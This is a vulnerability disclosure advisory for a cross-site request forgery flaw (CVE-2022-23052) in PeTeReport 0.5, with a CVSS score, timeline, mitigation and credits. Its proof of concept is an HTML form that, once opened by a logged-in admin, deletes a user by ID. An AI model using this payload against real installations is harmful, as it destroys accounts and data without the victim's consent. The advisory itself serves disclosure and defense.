PeTeReport 0.5 - Cross-site request forgery

Summary

NamePeTeReport 0.5 - Cross-site request forgery
Code nameJett
ProductPeTeReport
Affected versionsVersion 0.5
Fixed versionsVersion 0.7
StatePublic
Release date2022-02-23

Vulnerability

KindCross-site request forgery
Rule007. Cross-site request forgery
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:X/RL:X/RC:X
CVSSv3 Base Score4.3
Exploit availableNo
CVE ID(s)CVE-2022-23052

Description

PeteReport Version 0.5 contains a Cross Site Request Forgery (CSRF) vulnerability allowing an attacker to trick users into deleting users, products, reports and findings on the application.

Proof of Concept

Steps to reproduce

  1. Create a malicious html file with the following content.

    <html>
    <body>
    <script>history.pushState('', '', '/')</script>
        <!--Change ID -->
        <form action="https://127.0.0.1/configuration/user/delete/:id">
        <input type="submit" value="Submit request" />
        </form>
    </body>
    </html>
    
  2. If an authenticated admin visits the malicious url, the user with the correspond id will be deleted.

System Information

  • Version: PeteReport Version 0.5.
  • Operating System: Docker.
  • Web Server: nginx.

Exploit

There is no exploit for the vulnerability but can be manually exploited.

Mitigation

An updated version of PeteReport is available at the vendor page.

Credits

The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.

References

Vendor page https://github.com/1modm/petereport

Issue https://github.com/1modm/petereport/issues/34

Timeline

Time-lapse-logo

2022-02-07

Vulnerability discovered.

Time-lapse-logo

2022-02-07

Vendor contacted.

Time-lapse-logo

2022-02-09

Vendor replied acknowledging the report.

Time-lapse-logo

2022-02-09

Vulnerability patched.

Time-lapse-logo

2022-02-23

Public Disclosure.